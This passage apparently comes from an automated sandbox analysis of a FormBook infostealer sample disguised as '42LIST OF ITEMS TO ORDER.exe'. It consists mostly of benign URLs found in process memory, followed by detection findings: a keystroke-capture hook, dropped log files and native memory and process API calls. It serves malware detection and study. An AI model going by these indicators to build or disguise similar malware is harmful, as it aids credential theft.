Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000005.00000000.6564773160.000000000E05A000.00000004.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehpCacLMEMp
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpPLMEMx
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: http://www.msn.com/ocid=iehp
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico
Source: svchost.exe, 0000000C.00000000.7216767200.0000022382300000.00000004.sdmp | String found in binary or memory: https:///WAB-23B4D62B-952A-47E7-969C-B95DBF145D3D.local
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmp | String found in binary or memory: https:///live.com
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmp | String found in binary or memory: https:///windows.net
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmp | String found in binary or memory: https:///xboxlive.com
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=806016
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=806042
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmp | String found in binary or memory: https://login.live.com
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmp | String found in binary or memory: https://login.live.com/
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmp | String found in binary or memory: https://login.live.com/#
Source: svchost.exe, 0000000C.00000000.7225158697.0000022382F5E000.00000004.sdmp | String found in binary or memory: https://login.live.com/ApproveSession.srfenterp
Source: svchost.exe, 0000000C.00000002.7727688812.0000022382600000.00000004.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502t
Source: svchost.exe, 0000000C.00000000.7220824340.00000223827C2000.00000004.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000000C.00000000.7216767200.0000022382300000.00000004.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000000C.00000000.7225158697.0000022382F5E000.00000004.sdmp | String found in binary or memory: https://login.live.com/ManageApprover.srfenter
Source: svchost.exe, 0000000C.00000000.7225158697.0000022382F5E000.00000004.sdmp | String found in binary or memory: https://login.live.com/ManageLoginKeys.srfnter
Source: svchost.exe, 0000000C.00000000.7220071449.00000223826F2000.00000004.sdmp | String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000000C.00000002.7733974123.0000022382E83000.00000004.sdmp | String found in binary or memory: https://login.live.com/RST2.srfHHHHnPE
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033=9
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: svchost.exe, 0000000C.00000002.7731087063.0000022382A75000.00000004.sdmp, svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfs
Source: svchost.exe, 0000000C.00000000.7212068986.00000223814D9000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfettings
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfing
Source: svchost.exe, 0000000C.00000000.7225158697.0000022382F5E000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000000C.00000000.7220071449.00000223826F2000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cplive.com
Source: svchost.exe, 0000000C.00000000.7211361054.0000022381455000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfdatesns
Source: svchost.exe, 0000000C.00000002.7731087063.0000022382A75000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=806034
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604suer
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfRS5sys
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502Issuer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600-
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806035
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605Issuer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806069
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000000C.00000000.7217036538.0000022382376000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cplStores
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000000C.00000000.7217036538.0000022382376000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000000C.00000000.7220824340.00000223827C2000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf.
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf/
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmp | String found in binary or memory: https://login.windows.net
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmp | String found in binary or memory: https://login.windows.net/
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmp | String found in binary or memory: https://signup.live.com/signup.aspx
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: https://tarifrechner.heise.de/widget.phpprodukt=dsl
Source: svchost.exe, 0000000C.00000002.7727688812.0000022382600000.00000004.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.com
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: 42LIST OF ITEMS TO ORDER.exe, 00000000.00000002.6509017647.00000000001B0000.00000004.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

FormBook malware detected
Source: C:\Windows\SysWOW64\cmmon32.exe | Dropped file: C:\Users\user\AppData\Roaming\77P6C7R2\77Plogri.ini
Source: C:\Windows\SysWOW64\cmmon32.exe | Dropped file: C:\Users\user\AppData\Roaming\77P6C7R2\77Plogrf.ini
Source: C:\Windows\SysWOW64\cmmon32.exe | Dropped file: C:\Users\user\AppData\Roaming\77P6C7R2\77Plogrv.ini
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: 42LIST OF ITEMS TO ORDER.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA240 NtReadFile,LdrInitializeThunk,3_2_00EEA240
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA3E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00EEA3E0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA360 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00EEA360
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA480 NtMapViewOfSection,LdrInitializeThunk,3_2_00EEA480
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA460 NtOpenProcess,LdrInitializeThunk,3_2_00EEA460
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA5F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00EEA5F0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA560 NtQuerySystemInformation,LdrInitializeThunk,3_2_00EEA560
